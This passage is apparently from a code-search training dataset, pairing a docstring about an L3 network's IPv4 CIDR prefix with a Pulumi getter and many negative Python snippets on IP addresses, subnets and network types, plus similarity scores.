"def computer_network_name(self, computer_network_name: str):\n self._computer_network_name = computer_network_name",
"def subnetwork_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnetwork_name\")",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def core_network_attachment_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_attachment_arn\")",
"def layer_protocol_name(self) -> str:\n return self._layer_protocol_name"
] | [
"0.67701626",
"0.6730182",
"0.6579234",
"0.65378875",
"0.6346248",
"0.6293956",
"0.6253151",
"0.61782867",
"0.61560553",
"0.61084664",
"0.61054385",
"0.605106",
"0.59554195",
"0.59140545",
"0.5869591",
"0.58683455",
"0.58659315",
"0.5836901",
"0.5836809",
"0.5832016",
"0.582706",
"0.5820547",
"0.58059514",
"0.57857776",
"0.5777015",
"0.5722368",
"0.56486154",
"0.56398",
"0.56388086",
"0.56309706",
"0.56188774",
"0.55941486",
"0.5585376",
"0.5584135",
"0.5573169",
"0.5568992",
"0.553016",
"0.5501065",
"0.5497813",
"0.5496514",
"0.5491262",
"0.5480237",
"0.5476509",
"0.54581296",
"0.5441399",
"0.5439598",
"0.5422692",
"0.54218435",
"0.5406662",
"0.54003525",
"0.534749",
"0.5341064",
"0.53408533",
"0.53408533",
"0.53408533",
"0.53286207",
"0.5307978",
"0.53065",
"0.5304049",
"0.5286672",
"0.52833635",
"0.5270581",
"0.5269512",
"0.52598",
"0.5257598",
"0.52566457",
"0.5251153",
"0.52488893",
"0.5247088",
"0.5246333",
"0.5245039",
"0.52386594",
"0.5222346",
"0.522123",
"0.5213628",
"0.5212103",
"0.5206684",
"0.5197107",
"0.5179337",
"0.5178683",
"0.5175608",
"0.5168769",
"0.51683",
"0.5157992",
"0.5155772",
"0.5155772",
"0.514913",
"0.5148497",
"0.514717",
"0.5144888",
"0.513803",
"0.5127121",
"0.5126366",
"0.51253945",
"0.5109184",
"0.5100679",
"0.50949115",
"0.50894976",
"0.5085655",
"0.5073304"
] | 0.684074 | 0 |
The type of the IP address allocation, defaulted to "DualStack". | def ip_allocation_type(self) -> Optional[pulumi.Input[Union[str, 'IpAllocationType']]]:
return pulumi.get(self, "ip_allocation_type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def ip_allocation_type(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ip_allocation_type\")",
"def _get_address_type(self):\n return self.__address_type",
"def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))",
"def address_type(self) -> str:\n return pulumi.get(self, \"address_type\")",
"def get_ip_type2(self) -> str:\n hex_ip = hexlify(self.message)[154:162]\n ip_addr = int(hex_ip[0:2] + hex_ip[2:4] + hex_ip[4:6] + hex_ip[6:8], 16)\n return inet_ntoa(pack(\">L\", ip_addr))",
"def ip_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_type\")",
"def ip_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_type\")",
"def address_type(self):\n return addresser.AddressSpace.PROPOSALS",
"def type(self):\n return BipType.get_at(self.ea)",
"def get_network_type(self):\n net_type = self._data['type']\n if net_type == 'Shared':\n return 'guest'\n elif net_type == 'Isolated':\n return 'isolated'",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def test_external_ip_get_kind(self):\n assert_equal(self.test_external_ip.get_kind(), 'mpexternalip')",
"def AddrType(self) -> AddrTypes:\n return self.m_addr_type",
"def get_network_type(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkType', self.handle)",
"def SocketType(self) -> SocketType:",
"def ip_protocol(self) -> str:\n protocol = f\"ipv{self.ip_address.version}\"\n\n log.debug(\"Host %s: IP protocol for paramiko is %s.\", self.host)\n return protocol",
"def get_type(self):\n types = dict(ADDRESS_TYPE_CHOICES)\n return types.get(self.address_type, \"N/A\")",
"def _address_type(self, address):\n parsed_type = None\n parsed = urlparse.urlparse(address)\n if parsed.scheme not in ('http', 'https', 'ipc', 'tcp'):\n raise ValueError('Invalid volttron central address.')\n\n return parsed.scheme",
"def outside_ip_address_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def get_ip_version(network):\r\n if netaddr.IPNetwork(network).version == 6:\r\n return \"IPv6\"\r\n elif netaddr.IPNetwork(network).version == 4:\r\n return \"IPv4\"",
"def _get_network_type(self):\n return collections.namedtuple('hyper_dqn_network',\n ['hyp_q_value', 'q_values'])",
"def __ip_protocol(self, proto_num):\n if proto_num in self.protocols:\n return self.protocols[proto_num]\n return str(proto_num)",
"def ip_allocation_method(self) -> pulumi.Input[Union[str, 'VirtualMachineIPAllocationMethod']]:\n return pulumi.get(self, \"ip_allocation_method\")",
"def get_ip_version(network):\n if netaddr.IPNetwork(network).version == 6:\n return \"IPv6\"\n elif netaddr.IPNetwork(network).version == 4:\n return \"IPv4\"",
"def address(self):\n \n return self.__ip",
"def ip_protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def outside_ip_address_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def outside_ip_address_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def ip_protocol(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def pkt_type(self):\n return uint16_packer.unpack(self[32:34])[0]",
"def get_net_adapter_type(self):\n\t\treturn call_sdk_function('PrlSrvCfgNet_GetNetAdapterType', self.handle)",
"def is_ip(self) -> bool:\n return self.typ == ETH_P_IP",
"def getnetwork(ipaddr):\n return '192.168.1.0/24'",
"def get_name(self):\n \n return 'Socket/IP'",
"def _read_proto_resolve(self, addr: 'bytes', ptype: 'int') -> 'str | IPv4Address | IPv6Address':\n if ptype == Enum_EtherType.Internet_Protocol_version_4: # IPv4\n return ipaddress.ip_address(addr)\n if ptype == Enum_EtherType.Internet_Protocol_version_6: # IPv6\n return ipaddress.ip_address(addr)\n return addr.hex()",
"def getTransportType(self):\n if type(self.segment) is TcpSegment:\n return TCP_ID\n elif type(self.segment) is UdpSegment:\n return UDP_ID\n else:\n raise Exception(\"Unexpected type of transport protocol!\")",
"def _make_proto_resolve(self, addr: 'IPv4Address | IPv6Address | str | bytes', ptype: 'int') -> 'bytes':\n if ptype == Enum_EtherType.Internet_Protocol_version_4:\n return ipaddress.IPv4Address(addr).packed\n if ptype == Enum_EtherType.Internet_Protocol_version_6:\n return ipaddress.IPv6Address(addr).packed\n\n if isinstance(addr, str):\n return addr.encode()\n if isinstance(addr, (ipaddress.IPv4Address, ipaddress.IPv6Address)):\n return addr.packed\n return addr",
"def type(self):\n return self.sock.type",
"def ip_protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_protocol\")",
"def get_ip(self):",
"def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])",
"def getAddress(self) -> int:\n ...",
"def AioMessageTypeToIpAddressString(message_type):\n ip = network_config.AioMessageTypeToIpAddress(message_type)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)",
"def get_packet_type(cls, type_):\n if type_ <= ether.ETH_TYPE_IEEE802_3:\n type_ = ether.ETH_TYPE_IEEE802_3\n return cls._TYPES.get(type_)",
"def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"availability of the network offering\"\"\"\n self.availability = None\n self.typeInfo['availability'] = 'string'\n \"\"\"true if network offering is ip conserve mode enabled\"\"\"\n self.conservemode = None\n self.typeInfo['conservemode'] = 'boolean'\n \"\"\"the date this network offering was created\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"additional key/value details tied with network offering\"\"\"\n self.details = None\n self.typeInfo['details'] = 'map'\n \"\"\"an alternate display text of the network offering.\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if guest network default egress policy is allow; false if default egress policy is deny\"\"\"\n self.egressdefaultpolicy = None\n self.typeInfo['egressdefaultpolicy'] = 'boolean'\n \"\"\"true if network offering can be used by VPC networks only\"\"\"\n self.forvpc = None\n self.typeInfo['forvpc'] = 'boolean'\n \"\"\"guest type of the network offering, can be Shared or Isolated\"\"\"\n self.guestiptype = None\n self.typeInfo['guestiptype'] = 'string'\n \"\"\"true if network offering is default, false otherwise\"\"\"\n self.isdefault = None\n self.typeInfo['isdefault'] = 'boolean'\n \"\"\"true if network offering supports persistent networks, false otherwise\"\"\"\n self.ispersistent = None\n self.typeInfo['ispersistent'] = 'boolean'\n \"\"\"maximum number of concurrents connections to be handled by lb\"\"\"\n self.maxconnections = None\n self.typeInfo['maxconnections'] = 'integer'\n \"\"\"the name of the network offering\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"data transfer rate in megabits per second allowed.\"\"\"\n self.networkrate = None\n self.typeInfo['networkrate'] = 'integer'\n \"\"\"the ID of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingid = None\n self.typeInfo['secondaryserviceofferingid'] = 'string'\n \"\"\"the name of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingname = None\n self.typeInfo['secondaryserviceofferingname'] = 'string'\n \"\"\"the ID of the service offering used by virtual router provider\"\"\"\n self.serviceofferingid = None\n self.typeInfo['serviceofferingid'] = 'string'\n \"\"\"the name of the service offering used by virtual router provider\"\"\"\n self.serviceofferingname = None\n self.typeInfo['serviceofferingname'] = 'string'\n \"\"\"true if network offering supports specifying ip ranges, false otherwise\"\"\"\n self.specifyipranges = None\n self.typeInfo['specifyipranges'] = 'boolean'\n \"\"\"true if network offering supports vlans, false otherwise\"\"\"\n self.specifyvlan = None\n self.typeInfo['specifyvlan'] = 'boolean'\n \"\"\"state of the network offering. Can be Disabled/Enabled/Inactive\"\"\"\n self.state = None\n self.typeInfo['state'] = 'string'\n \"\"\"true if network offering supports network that span multiple zones\"\"\"\n self.supportsstrechedl2subnet = None\n self.typeInfo['supportsstrechedl2subnet'] = 'boolean'\n \"\"\"the tags for the network offering\"\"\"\n self.tags = None\n self.typeInfo['tags'] = 'string'\n \"\"\"the traffic type for the network offering, supported types are Public, Management, Control, Guest, Vlan or Storage.\"\"\"\n self.traffictype = None\n self.typeInfo['traffictype'] = 'string'\n \"\"\"the list of supported services\"\"\"\n self.service = []",
"def ip_info():\n return str(getIP())",
"def block_override_dns_type(self) -> str:\n return pulumi.get(self, \"block_override_dns_type\")",
"def IpNetwork(address, version=None):\n\n if version:\n if version == 4:\n return Ipv4Network(address)\n elif version == 6:\n return Ipv6Network(address)\n\n try:\n return Ipv4Network(address)\n except (ValueError):\n pass\n\n try:\n return Ipv6Network(address)\n except (ValueError):\n pass\n\n raise ValueError('%r does not appear to be an IPv4 or IPv6 network' % address)",
"def source_type(self):\n return SOURCE_TYPE_ROUTER",
"def source_type(self):\n return SOURCE_TYPE_ROUTER",
"def address(self):\n return f\"{self._type}.{self._id}\"",
"def get_allocated_address(\n self, config: ActorPoolConfig, allocated: allocated_type\n ) -> str:",
"def OSSupportsIPv4(self) -> bool:",
"def make(self, *,\n htype: 'Enum_Hardware | StdlibEnum | AenumEnum | str | int' = Enum_Hardware.Ethernet,\n htype_default: 'Optional[int]' = None,\n htype_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n htype_reversed: 'bool' = False,\n ptype: 'Enum_EtherType | StdlibEnum | AenumEnum | str | int' = Enum_EtherType.Internet_Protocol_version_4,\n ptype_default: 'Optional[int]' = None,\n ptype_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n ptype_reversed: 'bool' = False,\n hlen: 'int' = 6,\n plen: 'int' = 4,\n oper: 'Enum_Operation | StdlibEnum | AenumEnum | str | int' = Enum_Operation.REQUEST,\n oper_default: 'Optional[int]' = None,\n oper_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n oper_reversed: 'bool' = False,\n sha: 'str | bytes | bytearray' = '00:00:00:00:00:00',\n spa: 'IPv4Address | IPv6Address | str | bytes | bytearray' = '0.0.0.0', # nosec: B104\n tha: 'str | bytes | bytearray' = '00:00:00:00:00:00',\n tpa: 'IPv4Address | IPv6Address | str | bytes | bytearray' = '0.0.0.0', # nosec: B104\n payload: 'bytes | Protocol | Schema' = b'',\n **kwargs: 'Any') -> 'Schema_ARP':\n _htype = self._make_index(htype, htype_default, namespace=htype_namespace,\n reversed=htype_reversed, pack=False)\n _ptype = self._make_index(ptype, ptype_default, namespace=ptype_namespace,\n reversed=ptype_reversed, pack=False)\n _oper = self._make_index(oper, oper_default, namespace=oper_namespace,\n reversed=oper_reversed, pack=False)\n\n return Schema_ARP(\n htype=_htype,\n ptype=_ptype,\n hlen=hlen,\n plen=plen,\n oper=_oper,\n sha=self._make_addr_resolve(sha, _htype),\n spa=self._make_proto_resolve(spa, _ptype),\n tha=self._make_addr_resolve(tha, _htype),\n tpa=self._make_proto_resolve(tpa, _ptype),\n payload=payload,\n )",
"def get_ip_freebind(self):\n if hasattr(socket, \"IP_FREEBIND\"):\n # Valid distribution\n return socket.IP_FREEBIND\n if sys.platform == \"linux2\":\n return 15\n return None",
"def device_type(self) -> str:\n return \"urn:schemas-upnp-org:device:InternetGatewayDevice:1\"",
"def addressing(self) -> Optional[AddressingType]: # pylint: disable=unsubscriptable-object\n return self.pdu_sequence[0].addressing if self.pdu_sequence else None",
"def get_ip_address(self):\n raise NotImplementedError",
"def Address(self) -> _n_5_t_0:",
"def get_preferred_ip(self, ip_type: IPTypes) -> str:\n if ip_type.value in self.ip_addrs:\n return self.ip_addrs[ip_type.value]\n raise CloudSQLIPTypeError(\n \"Cloud SQL instance does not have any IP addresses matching \"\n f\"preference: {ip_type.value})\"\n )",
"def new_ip(address):\n return IPy.IP(address)",
"def __init__(self) -> None:\n self.ip_address: str | None = None",
"def get_type(network: ipaddress.ip_network) -> str:\n for t in TYPES:\n if getattr(network, f\"is_{t}\"):\n return t",
"def ipv4(self):\n return Network(private=True).ipv4",
"def __index__(cls) -> 'Enum_EtherType': # pylint: disable=invalid-index-returned\n return Enum_EtherType.Address_Resolution_Protocol # type: ignore[return-value]",
"def address(self):\n return \"%s:%s\" % (self.ip, self.port)",
"def _get_network_type(self, host):\n network_type = host.get(\"network\")\n default_network = self.config.get(\"default_network\")\n if network_type is None:\n network_type = self._metadata.get(\"network\", default_network)\n if not network_type:\n raise ProvisioningConfigError(\n \"No network type specified and project doesn't have default \"\n \"network type (property 'default_network') specified in \"\n \"provisioning config.\"\n )\n return network_type",
"def __detect_type__(self, value):\n def is_ipv6_address(value):\n try:\n value, interface = value.split('%', 1)\n except: # noqa\n pass\n try:\n parts = value.split(':')\n for part in parts:\n if part == '':\n continue\n part = int(part, 16)\n if part < 0:\n raise ValueError\n return True\n except Exception:\n return False\n\n def is_ipv4_address(value):\n try:\n value, interface = value.split('%', 1)\n except: # noqa\n pass\n try:\n parts = value.split('.', 3)\n for part in parts:\n part = int(part)\n if part < 0 or part > 255:\n raise ValueError\n return True\n except: # noqa\n return False\n\n # Strip port\n if value.startswith('['):\n value = value[1:]\n try:\n value, port = value.split(':', 1)\n except: # noqa\n pass\n\n if value.endswith(']'):\n value = value[:-1]\n\n if is_ipv4_address(value):\n return 1, value, 'ipv4_address'\n\n elif is_ipv6_address(value):\n return 2, value, 'ipv6_address'\n\n else:\n return 0, value, 'hostname'",
"def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']",
"def address(self):\n if self.con_strategy == \"local\":\n return self.address_local()\n if self.con_strategy == \"remote\":\n return self.address_remote()\n return None",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def __ip2intstr(self, address):\n return str(struct.unpack('!I', address)[0])",
"def new_ip(address):\n return ipaddress.IPv4Address(address)",
"def LocalAddress(self) -> _n_5_t_0:",
"def __init__(self, address, type,):\n self.address = address\n self.type = type",
"def _is_network_type(self, name):\n nt = self.config[\"networks\"].get(name)\n return bool(nt)",
"def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet",
"def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n if not ipaddress:\n raise SoftDependencyError(\"ipaddress\")\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol",
"def to_python(self, value):\n if isinstance(value, (ipaddress.IPv4Network, ipaddress.IPv6Network)):\n return value\n\n if value is None:\n return value\n\n try:\n return ipaddress.ip_network(value)\n except ValueError:\n raise ValidationError(_(\"Invalid input for an IP network.\"))",
"def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)",
"def test_create_host_subnet(self):\n pass",
"def get_address(self):\r\n return \"iDigi\"",
"def address_family(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"address_family\")",
"def app_network_access_type(self) -> Optional[pulumi.Input['DomainAppNetworkAccessType']]:\n return pulumi.get(self, \"app_network_access_type\")",
"def guess_network(self):\n # decide what sort of network we are going to use\n # return the actual type\n # right now we just use the first host only network and that's it\n host_only = list(HostOnlyNetwork.find_networks())\n if host_only:\n return host_only[0]\n else:\n return NewHostOnlyNetwork()",
"def SupportsIPv4(self) -> bool:",
"def getIp(self):\n raise NotImplementedError",
"def adjust_ip (self, ip=None):\n if ip != None and ip.haslayer(IP):\n if (self.type == 0x11):\n if (self.gaddr == \"0.0.0.0\"):\n ip.dst = \"224.0.0.1\" # IP rule 1\n retCode = True \n elif isValidMCAddr(self.gaddr):\n ip.dst = self.gaddr # IP rule 3a\n retCode = True\n else:\n print \"Warning: Using invalid Group Address\"\n retCode = False\n elif ((self.type == 0x17) and isValidMCAddr(self.gaddr)):\n ip.dst = \"224.0.0.2\" # IP rule 2\n retCode = True\n elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(self.gaddr)):\n ip.dst = self.gaddr # IP rule 3b\n retCode = True\n else:\n print \"Warning: Using invalid IGMP Type\"\n retCode = False\n else:\n print \"Warning: No IGMP Group Address set\"\n retCode = False\n if retCode == True:\n ip.ttl=1 # IP Rule 4\n ip.options=[IPOption_Router_Alert()] # IP rule 5\n return retCode",
"def is_on_stack(self, address):\n return self.is_address_of_type(address, MemoryType.Stack)",
"def buildProtocol(addr):",
"def type(self) -> Optional[pulumi.Input[Union[str, 'AgentPoolType']]]:\n return pulumi.get(self, \"type\")",
"def server_type(self):\n ...",
"def app_network_access_type(self) -> pulumi.Output[Optional['DomainAppNetworkAccessType']]:\n return pulumi.get(self, \"app_network_access_type\")",
"def get_network_allocations_number(self):\r\n LOG.debug(\"Get network allocations number.\")\r\n return constants.IP_ALLOCATIONS",
"def allocate_address():\n response = EC2.allocate_address(\n )\n return response",
"def __str__(self):\n return \"{}\".format(visiteur.ip)"
] | [
"0.66921926",
"0.6558105",
"0.6343783",
"0.62579095",
"0.6204035",
"0.61733663",
"0.60489833",
"0.6027968",
"0.590761",
"0.5870783",
"0.57298845",
"0.5710156",
"0.569875",
"0.5694414",
"0.5689083",
"0.5678903",
"0.5581792",
"0.5554217",
"0.5541468",
"0.55387825",
"0.5525745",
"0.55044353",
"0.55011237",
"0.5486684",
"0.5449133",
"0.5444622",
"0.54439265",
"0.54439265",
"0.5438365",
"0.5434098",
"0.54337263",
"0.54220146",
"0.54215086",
"0.5400311",
"0.53990924",
"0.53750294",
"0.53706646",
"0.5356622",
"0.53405666",
"0.5335872",
"0.5334917",
"0.53232276",
"0.5311669",
"0.5299823",
"0.5293537",
"0.5280677",
"0.5266033",
"0.5264635",
"0.52623934",
"0.52623934",
"0.5261298",
"0.5239982",
"0.52353704",
"0.5234466",
"0.5227017",
"0.52248585",
"0.52146244",
"0.52139854",
"0.52075285",
"0.51957333",
"0.5188182",
"0.5170947",
"0.516927",
"0.51688737",
"0.5168697",
"0.5167536",
"0.51347405",
"0.5131819",
"0.5124529",
"0.51238346",
"0.5104629",
"0.5104629",
"0.5104629",
"0.5102564",
"0.5093965",
"0.5091164",
"0.50869805",
"0.50857097",
"0.5078986",
"0.50723845",
"0.5067969",
"0.5061323",
"0.5042722",
"0.5033845",
"0.50227296",
"0.50064415",
"0.49977282",
"0.4990625",
"0.49844098",
"0.49809164",
"0.49645197",
"0.4952559",
"0.49496102",
"0.4946586",
"0.49462265",
"0.49414185",
"0.49401394",
"0.4938156",
"0.49322572",
"0.49314168"
] | 0.60764885 | 6 |
The IPV4 prefix (CIDR) assigned to this L3 network. Required when the IP allocation type is IPV4 or DualStack. | def ipv4_connected_prefix(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ipv4_connected_prefix") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def local_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def ipv4(self):\n return Network(private=True).ipv4",
"def ipv4_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def ipv4_address(self) -> str:\n return pulumi.get(self, \"ipv4_address\")",
"def ipv4_address(self) -> str:\n return pulumi.get(self, \"ipv4_address\")",
"def ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_cidr_block\")",
"def ipv4_address_space(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_address_space\")",
"def ipv4_address_space(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_address_space\")",
"def network(self):\n address = unicode(\"%s/%s\" % (self.address, _get_cidr(self.netmask)))\n return IPv4Network(address, strict=False)",
"def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use cluster_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"cluster_ipv4_cidr is deprecated: This field is deprecated, use cluster_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"cluster_ipv4_cidr\")",
"def prefixes_ipv4(self):\n with open(self.ixpfx) as f:\n ixpfx = json.load(f)\n return [item['prefix'] for item in ixpfx['data'] if item['protocol'] == 'IPv4']",
"def ipv4_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_address\")",
"def remote_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def node_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use node_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"node_ipv4_cidr is deprecated: This field is deprecated, use node_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"node_ipv4_cidr\")",
"def _get_ipv4(self):\n return self.__ipv4",
"def _get_ipv4(self):\n return self.__ipv4",
"def _get_ipv4(self):\n return self.__ipv4",
"def subnet_prefix(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"subnet_prefix\")",
"def remote_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def remote_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def get_ipv4_address(self):\n \n ipv4_address = self._dhcp_client_ctrl.getIpv4Address()\n if ipv4_address is None:\n return None\n else:\n return unicode(ipv4_address)",
"def getIpv4Netmask(self):\n with self.status._dhcp_status_mutex:\n if self.status.ipv4_lease_valid is None:\n return None\n else:\n return self.status.ipv4_netmask",
"def master_ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"master_ipv4_cidr_block\")",
"def local_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def ip_address_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address_prefix\")",
"def normalize_ip4(self):\n\n ip = str(self.ip4)\n # Let's normalize the ip list first\n ip_list = list(\n map(\n lambda v: ipaddress.IPv4Network(v),\n filter(\n lambda v: self.try_convert(v, None, ipaddress.IPv4Network),\n map(\n lambda v: v.split('|')[1].split('/')[0].strip()\n if '|' in v else\n v.split('/')[0].strip(),\n ip.split(',')\n )\n )\n )\n )\n\n if ip_list:\n ip_list.sort()\n ip = tuple(\n int(c)\n for c in str(ip_list[0]).split('/')[0].split('.')\n )\n else:\n ip = (9999, ip)\n\n self.ip4 = ip",
"def node_ipv4_cidr_size(self) -> int:\n return pulumi.get(self, \"node_ipv4_cidr_size\")",
"def cidr(self):\n return self._cidr",
"def prefixlen(self):\n return self._ip_range.prefixlen",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def NoOfAddressPrefix(self):\n return self._get_attribute('noOfAddressPrefix')",
"def get_ipv4_netmask(self):\n \n ipv4_netmask = self._dhcp_client_ctrl.getIpv4Netmask()\n if ipv4_netmask is None:\n return None\n else:\n return unicode(ipv4_netmask)",
"def cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cidr\")",
"def Ipv4Flag(self):\r\n\t\treturn self._get_attribute('ipv4Flag')",
"def getIpv4Address(self):\n with self.status._dhcp_status_mutex:\n if self.status.ipv4_lease_valid is None:\n return None\n else:\n return self.status.ipv4_address",
"def get_address(self):\n return self.get_ipv4_address()",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cidr\")",
"def services_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use services_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"services_ipv4_cidr is deprecated: This field is deprecated, use services_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"services_ipv4_cidr\")",
"def __str__(self):\n retval = \"IPv4\\n\"\n for field in self.layout:\n if (field.name == \"src\" or field.name == \"dst\"):\n value = inet_ntop(AF_INET,\n struct.pack('!L', self.__dict__[field.name]))\n retval += \"%s %s\\n\" % (field.name, value)\n else:\n retval += \"%s %s\\n\" % (field.name, self.__dict__[field.name])\n return retval",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def Ipv4rate(self):\n\t\treturn self._get_attribute('ipv4rate')",
"def reverse_prefix(self):\n if self.type == ZONE_REVERSE_IPV4:\n # Get IPv4 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".in-addr.arpa\"):\n r = n[:-13].split(\".\")\n r.reverse()\n length = 4 - len(r)\n r += [\"0\"] * length\n ml = 32 - 8 * length\n return \".\".join(r) + \"/%d\" % ml\n elif self.type == ZONE_REVERSE_IPV6:\n # Get IPv6 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".ip6.int\"):\n n = n[:-8]\n elif n.endswith(\".ip6.arpa\"):\n n = n[:-9]\n else:\n raise Exception(\"Invalid IPv6 zone suffix\")\n p = n.split(\".\")\n p.reverse()\n length = len(p)\n if length % 4:\n p += [\"0\"] * (4 - length % 4)\n r = \"\"\n for i, c in enumerate(p):\n if i and i % 4 == 0:\n r += \":\"\n r += c\n if len(p) != 32:\n r += \"::\"\n prefix = r + \"/%d\" % (length * 4)\n return IPv6(prefix).normalized.prefix",
"def address_prefix(self) -> Optional[str]:\n return pulumi.get(self, \"address_prefix\")",
